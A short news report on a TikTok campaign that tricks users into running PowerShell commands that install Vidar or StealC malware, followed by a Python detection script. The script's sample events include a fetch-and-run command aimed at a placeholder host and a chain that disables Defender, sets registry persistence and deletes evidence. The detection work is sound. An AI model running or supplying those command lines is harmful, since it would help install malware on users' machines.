TikTok Videos Trick Users Into Installing Vidar Malware
Cybercriminals are exploiting TikTok’s algorithmic reach to distribute malware through fake software activation videos, according to research by Trend Micro. The campaign, known as ClickFix, uses AI-generated content to trick users into running PowerShell commands disguised as steps for unlocking premium features in apps like Windows, Office, CapCut, and Spotify.
The scripts download and execute Vidar or StealC malware, disable protections, establish persistence via the Windows registry, and erase evidence. One video amassed nearly 500,000 views and over 20,000 likes before removal, highlighting how trust in social media can be manipulated.
Vidar connects to command-and-control servers using services such as Telegram and Steam to obscure its infrastructure, while StealC uses direct IP communication. Several nearly identical videos were traced to inactive TikTok accounts, suggesting automated content generation.
Trend Micro warns that traditional defenses may miss such threats and recommends integrating behavioral analysis, social media monitoring, and user education into security strategies to counter evolving attack methods.
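As an added illustration of the behavioral analysis recommended above (not code from Trend Micro or from the original article), the following Python tags PowerShell command lines with the behaviors the article lists and scores them on combinations rather than single matches. The regex patterns, the severity rule and the sample log lines are constructed assumptions, not indicators published for this campaign.

```python
import re

# Behaviours named in the article, mapped to PowerShell idioms that commonly
# implement them. Patterns are illustrative assumptions, not campaign IoCs.
BEHAVIOURS = {
    "download": re.compile(
        r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|"
        r"downloadfile|start-bitstransfer)\b", re.I),
    "execute": re.compile(r"\b(invoke-expression|iex|start-process)\b", re.I),
    "disable_protection": re.compile(
        r"\b(add-mppreference\s+-exclusion\w+|set-mppreference\s+-disable\w+)", re.I),
    "registry_persistence": re.compile(r"currentversion\\run(once)?\b", re.I),
    "erase_evidence": re.compile(r"\b(remove-item|clear-history)\b", re.I),
}
CHAIN = {"download", "execute"}

def tag(cmdline):
    """Return the set of behaviours whose pattern appears in one command line."""
    return {name for name, rx in BEHAVIOURS.items() if rx.search(cmdline)}

def verdict(cmdline):
    """Score on combinations, since each behaviour alone is common admin work."""
    tags = tag(cmdline)
    extras = tags - CHAIN
    if CHAIN <= tags and extras:
        return "high"      # fetch-and-run plus tampering, persistence or cleanup
    if CHAIN <= tags or len(extras) >= 2:
        return "medium"
    return "low"

# Constructed sample events (process command lines / script block text).
SAMPLES = [
    r'powershell -w hidden -c "iex (irm https://example.invalid/activate.ps1)"',
    r"Add-MpPreference -ExclusionPath <dir>; iwr https://example.invalid/p.bin "
    r"-OutFile <file>; Start-Process <file>; New-ItemProperty -Path "
    r"'HKCU:\...\CurrentVersion\Run' -Name u -Value <file>; Remove-Item <script>",
    r'powershell -c "Get-ChildItem C:\Temp | Remove-Item -Recurse"',
    r"Invoke-WebRequest https://example.invalid/health -UseBasicParsing",
]

def triage(samples=SAMPLES):
    return [(verdict(s), sorted(tag(s))) for s in samples]

if __name__ == "__main__":
    for level, tags in triage():
        print(f"{level:6} {tags}")
```

In practice the input would be process-creation or PowerShell script block logging events, and the combination rule keeps routine single-behavior administration out of the alert queue.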
